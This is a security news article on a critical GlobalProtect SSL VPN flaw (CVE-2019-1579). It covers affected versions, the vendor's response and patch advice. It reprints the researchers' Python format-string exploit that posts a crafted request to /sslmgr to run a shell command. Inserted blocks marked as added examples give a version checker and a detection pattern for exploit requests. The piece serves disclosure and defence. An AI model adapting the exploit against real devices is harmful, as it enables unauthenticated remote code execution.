
Security researchers published PoC code for a critical vulnerability in Palo Alto Networks firewalls

Palo Alto Networks vulnerability
Written by Brendan Smith

Palo Alto Networks quietly fixed a critical vulnerability in its corporate GlobalProtect SSL VPN solution, which is implemented in Palo Alto firewalls.

Exploiting the vulnerability allowed attackers to remotely execute arbitrary code. The vulnerability (CVE-2019-1579), which affects the GlobalProtect portal and the GlobalProtect Gateway interface, can be exploited by an unauthenticated attacker who sends a specially crafted request to the device.

Security researchers Orange Tsai and Meh Chang discovered the bug.

“We surveyed all Palo Alto SSL VPN over the world to see if there are any large corporations using the vulnerable GlobalProtect, and Uber is one of them!”, the researchers said.

Uber responded very quickly and took the right step by fixing the vulnerability.

Affected versions:

According to our survey, all GlobalProtect versions before July 2018 are vulnerable! Here is the affected version list:

  • Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
  • Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
  • Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3
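To turn the version list above into something an administrator can run against a device inventory, here is an added example (not code from the article or from Palo Alto Networks) that classifies a PAN-OS version string against the three affected branches and their first fixed releases. It assumes the usual `major.minor.patch` form, treats a hotfix suffix such as `-h1` as irrelevant to the comparison, and reports branches the article does not list (for example 9.x) as "not in affected list" rather than guessing; the inventory values are constructed.

```python
# Added example (not from the article): classify a PAN-OS / GlobalProtect
# version string against the affected ranges listed in the article.
from typing import Dict, Optional, Tuple

# First fixed release per affected branch, exactly as the article lists them.
FIXED_IN = {
    (7, 1): (7, 1, 19),
    (8, 0): (8, 0, 12),
    (8, 1): (8, 1, 3),
}

def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '8.0.11-h1' or '7.1.19' into a comparable (major, minor, patch) tuple.
    A hotfix suffix ('-h1') is ignored (assumption: only the base release matters here)."""
    core = version.strip().split("-", 1)[0]
    parts = core.split(".")
    if len(parts) < 3 or not all(p.isdigit() for p in parts[:3]):
        raise ValueError(f"unrecognised version string: {version!r}")
    return int(parts[0]), int(parts[1]), int(parts[2])

def is_vulnerable(version: str) -> Optional[bool]:
    """True  -> inside a listed affected range (below the fixed release on that branch)
       False -> at or above the fixed release on a listed branch
       None  -> branch not covered by the article's list; check the vendor advisory."""
    major, minor, patch = parse_version(version)
    fixed = FIXED_IN.get((major, minor))
    if fixed is None:
        return None
    return (major, minor, patch) < fixed

def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map device name -> status label for a {name: version} inventory."""
    labels = {True: "VULNERABLE", False: "fixed", None: "not in affected list"}
    return {name: labels[is_vulnerable(v)] for name, v in inventory.items()}

if __name__ == "__main__":
    # Constructed sample inventory.
    sample = {
        "fw-edge-1": "8.0.11",
        "fw-edge-2": "8.1.3",
        "fw-lab": "9.0.1",
        "fw-old": "7.1.18-h3",
    }
    for name, status in triage(sample).items():
        print(f"{name}: {status}")
```

The `None` result is deliberate: a branch the article does not enumerate is neither safe nor vulnerable on the strength of this list alone, so the script refuses to label it.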

PoC code:

The researchers published PoC code demonstrating how the vulnerability is exploited.

```python
#!/usr/bin/python

import requests
from pwn import *

url = "https://sslvpn/sslmgr"
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"

strlen_GOT = 0x667788 # change me
system_plt = 0x445566 # change me

fmt =  '%70$n'
fmt += '%' + str((system_plt>>16)&0xff) + 'c'
fmt += '%32$hn'
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'
fmt += '%24$hn'
for i in range(40,60):
    fmt += '%'+str(i)+'$p'

data = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt
data += "&appauthcookie="
data += cmd
r = requests.post(url, data=data)
```
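From a defender's side, the PoC above has an easily recognisable shape: a POST to the `/sslmgr` endpoint whose form fields carry printf-style positional directives (`%70$n`, `%32$hn`, `%40$p`), something no legitimate client would send. The following added example (not code from the article or the researchers) scans raw request bodies for exactly that pattern. It assumes access to the undecoded body, as a WAF or full packet capture would provide, because URL-decoding first would mangle the `%` sequences; the sample requests are constructed.

```python
# Added example (not from the article): flag POST bodies to the GlobalProtect
# /sslmgr endpoint that carry printf-style format directives, a strong
# indicator of a CVE-2019-1579 exploitation attempt.
import re
from typing import Dict, List, Tuple

# Positional or length-modified directives ('%70$n', '%32$hn', '%45$p') never
# belong in legitimate form fields; a lone '%40' from URL-encoding does not match.
FORMAT_DIRECTIVE = re.compile(rb"%\d*\$?(?:h{1,2}n|n|p)")
TARGET_PATH = b"/sslmgr"

def split_form(body: bytes) -> Dict[bytes, bytes]:
    """Split a raw x-www-form-urlencoded body on '&' and '=' WITHOUT percent-decoding,
    so the '%' characters of a format string survive for inspection. Repeated keys
    (the PoC sends appauthcookie twice) are concatenated rather than overwritten."""
    fields: Dict[bytes, bytes] = {}
    for pair in body.split(b"&"):
        key, _, value = pair.partition(b"=")
        fields[key] = fields.get(key, b"") + value
    return fields

def inspect_request(path: bytes, body: bytes) -> List[str]:
    """Return human-readable findings for one request; an empty list means clean."""
    if path != TARGET_PATH:
        return []
    findings: List[str] = []
    for key, value in split_form(body).items():
        hits = FORMAT_DIRECTIVE.findall(value)
        if hits:
            findings.append(
                f"{key.decode(errors='replace')}: {len(hits)} format directive(s), "
                f"e.g. {hits[0].decode()}"
            )
    return findings

# Constructed sample traffic: a benign enrolment request, one shaped like the
# PoC (without its raw address bytes), and a format string on an unrelated path.
SAMPLE_REQUESTS: List[Tuple[bytes, bytes]] = [
    (b"/sslmgr", b"scep-profile-name=corp&user-email=alice%40example.com&host-id=LAPTOP1"),
    (b"/sslmgr", b"scep-profile-name=AAA&appauthcookie=BBB&host-id=CCC"
                 b"&user-email=%70$n%55c%32$hn%24$hn%40$p%41$p&appauthcookie=id"),
    (b"/global-protect/login.esp", b"user=bob&passwd=%70$n"),
]

def scan(requests: List[Tuple[bytes, bytes]] = SAMPLE_REQUESTS) -> Dict[int, List[str]]:
    """Index of request -> findings, only for requests that produced findings."""
    results: Dict[int, List[str]] = {}
    for i, (path, body) in enumerate(requests):
        findings = inspect_request(path, body)
        if findings:
            results[i] = findings
    return results

if __name__ == "__main__":
    for i, findings in scan().items():
        print(f"request {i}: " + "; ".join(findings))
```

The third sample is left unflagged on purpose: the rule is scoped to `/sslmgr` so it stays a high-confidence signal for this bug. A broader rule that matches format directives on any path is reasonable as a lower-severity alert, but that is a separate tuning decision; the patch levels listed in the article remain the actual fix.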


How to fix?

When the researchers reported this bug to Palo Alto Networks, however, they received the following reply:

“Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know”, Palo Alto Networks commented.

So it seems this vulnerability was already known to Palo Alto, but had not been disclosed to the world.

Administrators are urged to upgrade to PAN-OS 7.1.19 or later, 8.0.12 or later, or 8.1.3 or later.


About the author

Brendan Smith

Journalist, researcher, web content developer, grant proposal editor. Efficient and proficient on multiple platforms and in diverse media. Computer technology and security are my specialties.
